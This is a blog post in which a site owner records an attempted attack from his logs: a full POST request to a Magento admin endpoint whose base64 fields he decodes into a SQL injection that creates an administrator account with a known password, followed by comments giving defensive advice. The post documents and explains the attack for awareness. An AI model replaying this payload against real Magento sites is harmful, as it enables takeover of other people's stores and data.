Attacker attempting a SQL injection via POST /admin/Cms_Wysiwyg/directive/index/ request

I’ve only seen this attack twice in the past six months (as far back as I keep logs). The first was on 2015-09-15 from domain qs.biz in Russia (RU). The most recent was today, 2015-09-24, from gigaboxhosting.net in US. This was the request:

POST /admin/Cms_Wysiwyg/directive/index/ HTTP/1.1
Host: www.skepticism.us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2;
Accept: */*
Content-Length: 1349
Expect: 100-continue
Content-Type: multipart/form-data; boundary=------------------------daadfd20bc730c50

--------------------------daadfd20bc730c50
Content-Disposition: form-data; name="filter"

cG9wdWxhcml0eVtmcm9tXT0wJnBvcHVsYXJpdHlbdG9dPTM…
--------------------------daadfd20bc730c50
Content-Disposition: form-data; name="___directive"

e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ==
--------------------------daadfd20bc730c50
Content-Disposition: form-data; name="forwarded"

1
--------------------------daadfd20bc730c50--

The ___directive value decodes to

{{block type=Adminhtml/report_search_grid output=getCsvFile}}

The filter value decodes to

popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);SET @SALT = \t'rp';SET @PASS = CONCAT(MD5(CONCAT( @SALT , 'ganteng123') ), CONCAT(':',
@SALT ));SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','039efceb0a7b17b@telekpitekwashere.cok','coadmin',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = 'coadmin'),'Firstname');

A google search suggests that this attacker is trying to exploit a vulnerability in the Magento.com CMS products that has already been fixed. The attacker is clearly trying to create an administrator account with a password that they know (“ganteng123”) in order to gain control of the site.

This attack against my server is more sophisticated than the majority of attacks I’ve seen. It’s a variation of a SQL injection attack most notably illustrated by Randall Munroe at his XKCD cartoon “Exploits of a Mom”.

Published by

Kurtis Rader

I’m first and foremost a Secular Humanist and Atheist. To pay the bills I’m a software engineer. When not working I walk or play with my dogs, read lots of non-fiction (and some fiction), and watch lots of movies.

2 thoughts on “Attacker attempting a SQL injection via POST /admin/Cms_Wysiwyg/directive/index/ request”

  1. Ohhh. I am using magento. I have same user name i found on 29.8.15. Unfortunately i checked and i found it. By Default it doesn’t damage anything. How to stop this nonsense. ?

  2. I don’t know anything about Magneto.com CMS products. Having said that the first two, very obvious, steps to take is

    1) Delete any account you do not recognize.

    2) Upgrade your installation to close the security hole the attacker is exploiting.

    I would then recommend evaluating your firewall rules. If you’re using Apache HTTP server you should consider using mod_rewrite rules, possibly in conjunction with virtual hosts, to only allow access to the /admin/Cms_Wysiwyg path from trusted sources (e.g., your private, internal, network).

Comments are closed.